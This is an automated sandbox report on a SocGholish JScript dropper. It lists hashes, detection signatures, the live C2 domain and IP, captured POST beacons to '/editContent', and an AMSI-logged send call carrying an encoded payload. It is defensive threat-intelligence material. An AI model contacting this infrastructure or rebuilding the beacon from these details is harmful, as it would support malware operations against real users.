Windows Analysis Report
Version.125.7599.75.js

Overview

General Information

Sample name: Version.125.7599.75.js
Analysis ID: 1431609
MD5: 0fed9ddc5b3dfd8b5db67a80ad322f3a
SHA1: 53c92820c6d2f60599967bc1ba72f76b7770401e
SHA256: a6985225afe814ab6dd06dc6113753757392f7546e336db9a76b4b6af6fb48b2

Detection

SocGholish
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
JScript performs obfuscated calls to suspicious functions
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected SocGholish
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Found WSH timer for Javascript or VBS script (likely evasive script)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication

Classification

AV Detection

barindex
Source: https://bxs.anesthetics.biomedzglobal.com/ Avira URL Cloud: Label: malware
Source: https://bxs.anesthetics.biomedzglobal.com/editContent9 Avira URL Cloud: Label: malware
Source: https://bxs.anesthetics.biomedzglobal.com/editContent Avira URL Cloud: Label: malware
Source: https://bxs.anesthetics.biomedzglobal.com/editContentG Avira URL Cloud: Label: malware
Source: https://bxs.anesthetics.biomedzglobal.com/editContent Virustotal: Detection: 5%
Source: unknown HTTPS traffic detected: 45.59.170.27:443 -> 192.168.2.4:49730 version: TLS 1.2

Networking

barindex
Source: Traffic Snort IDS: 2052170 ET TROJAN SocGholish CnC Domain in DNS Lookup (* .anesthetics .biomedzglobal .com) 192.168.2.4:64157 -> 1.1.1.1:53
Source: Traffic Snort IDS: 2052171 ET TROJAN SocGholish CnC Domain in TLS SNI (* .anesthetics .biomedzglobal .com) 192.168.2.4:49730 -> 45.59.170.27:443
Source: C:\Windows\System32\wscript.exe Network Connect: 45.59.170.27 443
Source: Joe Sandbox View ASN Name: MEDIACOM-ENTERPRISE-BUSINESSUS
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic HTTP traffic detected:
  POST /editContent HTTP/1.1
  Accept: */*
  Upgrade-Insecure-Requests: 1
  Accept-Language: en-ch
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: bxs.anesthetics.biomedzglobal.com
  Content-Length: 44
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: bxs.anesthetics.biomedzglobal.com
Source: unknown HTTP traffic detected:
  POST /editContent HTTP/1.1
  Accept: */*
  Upgrade-Insecure-Requests: 1
  Accept-Language: en-ch
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: bxs.anesthetics.biomedzglobal.com
  Content-Length: 44
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Server: nginx
  Date: Thu, 25 Apr 2024 12:24:22 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: close
Source: wscript.exe, 00000000.00000003.1736833114.000001A083AD9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bxs.anesthetics.biomedzglobal.com/
Source: wscript.exe, wscript.exe, 00000000.00000003.1701094960.000001A085B73000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1736074113.000001A0859A5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1737220941.000001A0839C5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1737551980.000001A083AA5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1735718332.000001A083A8B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1702236239.000001A085B73000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1702620077.000001A085B73000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1735880695.000001A083AA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1701334680.000001A085810000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bxs.anesthetics.biomedzglobal.com/editContent
Source: wscript.exe, 00000000.00000003.1701094960.000001A085B73000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1737880248.000001A085B73000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1702236239.000001A085B73000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1736534060.000001A085B73000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1702620077.000001A085B73000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bxs.anesthetics.biomedzglobal.com/editContent9
Source: wscript.exe, 00000000.00000002.1737551980.000001A083AA5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1735718332.000001A083A8B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1735880695.000001A083AA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bxs.anesthetics.biomedzglobal.com/editContentG
Source: wscript.exe, 00000000.00000002.1737551980.000001A083AA5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1735718332.000001A083A8B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1735880695.000001A083AA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bxs.anesthetics.biomedzglobal.com/editContentg
Source: wscript.exe, 00000000.00000002.1737880248.000001A085B23000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1736534060.000001A085B23000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1702427130.000001A085B23000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1701705411.000001A085B23000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown HTTPS traffic detected: 45.59.170.27:443 -> 192.168.2.4:49730 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

barindex
Source: Yara match File source: Version.125.7599.75.js, type: SAMPLE
Source: Yara match File source: Process Memory Space: wscript.exe PID: 6732, type: MEMORYSTR

System Summary

barindex
Source: C:\Windows\System32\wscript.exe COM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}
Source: Version.125.7599.75.js Initial sample: Strings found which are bigger than 50
Source: classification engine Classification label: mal100.troj.evad.winJS@1/0@1/1
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msxml3.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wininet.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\wscript.exe Section loaded: schannel.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: textshaping.dll
Source: C:\Windows\System32\wscript.exe Section loaded: textinputframework.dll
Source: C:\Windows\System32\wscript.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\wscript.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32

Data Obfuscation

barindex
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: setRequestHeader("Upgrade-Insecure-Requests", "1");IServerXMLHTTPRequest2.send("tI//zLO+yCKDJY5Vnye1jc5pz1L3vJ3G5atMacSBjA==");<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: wscript.exe, 00000000.00000002.1737880248.000001A085B32000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1737551980.000001A083AA5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1701705411.000001A085B32000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1735718332.000001A083A8B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1702427130.000001A085B32000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1700913977.000001A085B32000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1736534060.000001A085B32000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1735880695.000001A083AA0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\System32\wscript.exe Network Connect: 45.59.170.27 443
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

barindex
Source: Yara match File source: Version.125.7599.75.js, type: SAMPLE
Source: Yara match File source: Process Memory Space: wscript.exe PID: 6732, type: MEMORYSTR

Remote Access Functionality

barindex
Source: Yara match File source: Version.125.7599.75.js, type: SAMPLE
Source: Yara match File source: Process Memory Space: wscript.exe PID: 6732, type: MEMORYSTR